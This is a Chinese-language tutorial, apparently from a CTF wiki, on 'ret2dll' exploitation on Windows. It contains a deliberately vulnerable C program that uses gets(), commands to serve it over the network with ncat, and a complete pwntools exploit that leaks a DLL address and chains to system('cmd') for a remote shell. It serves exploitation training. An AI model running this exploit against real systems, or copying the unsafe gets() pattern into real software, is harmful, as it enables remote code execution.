ret2dll利用¶
原理与linux下的ret2libc类似,不过需要手动提取地址,目前pwntools不能提取exe文件地址。 源代码如下
#include <stdio.h>
#include <ctype.h>
#define DEFAULT_LEN 16
int val(){
char buff[DEFAULT_LEN] = {0};
gets(buff);
}
int main(void)
{
puts("start");
fflush(stdout);
val();
fflush(stdout);
puts("end");
fflush(stdout);
}
gcc "-Wl,--disable-reloc" -g -o ret2dll.exe ret2dll.c
搭建临时环境¶
使用ncat ncat -l 8080 --keep-open --exec ".\ret2dll.exe"
使用win_server win_server ./ret2dll.exe 8080
exp如下
from pwn import *
context.log_level='debug'
context.arch='amd64'
p=remote("192.168.0.190",8080)#这里替换为windows的ip
main_addr=0x14000155B#手动输入地址
ret_addr=0x1400015D7
puts_plt=0x140002868
puts_got=0x14000829C
rdi_addr=0x140002447
rcx_addr=0x140002750
#bp 0x140001554
payload = b'a' * (0x10 +8)
payload += p64(rcx_addr)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(main_addr)
p.recvuntil("start")
p.sendline(payload)
puts_leak=u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b'\x00'))
print("leak addr:",hex(puts_leak))
puts_dll=0x11014E470
cmd_dll=0x0110179E48
sytem_dll=0x0110117E50
dll_base=puts_leak-puts_dll
# dll_base=0x7ffe71e00000
print("base addr:",hex(dll_base))
cmd_addr = dll_base +cmd_dll
system_addr=dll_base+sytem_dll
print("start attck")
payload = b'a' * (0x10 + 8)
payload += p64(ret_addr)
payload += p64(rcx_addr)
payload += p64(cmd_addr)
payload += p64(system_addr)
p.sendline(payload)
p.interactive()
效果如下
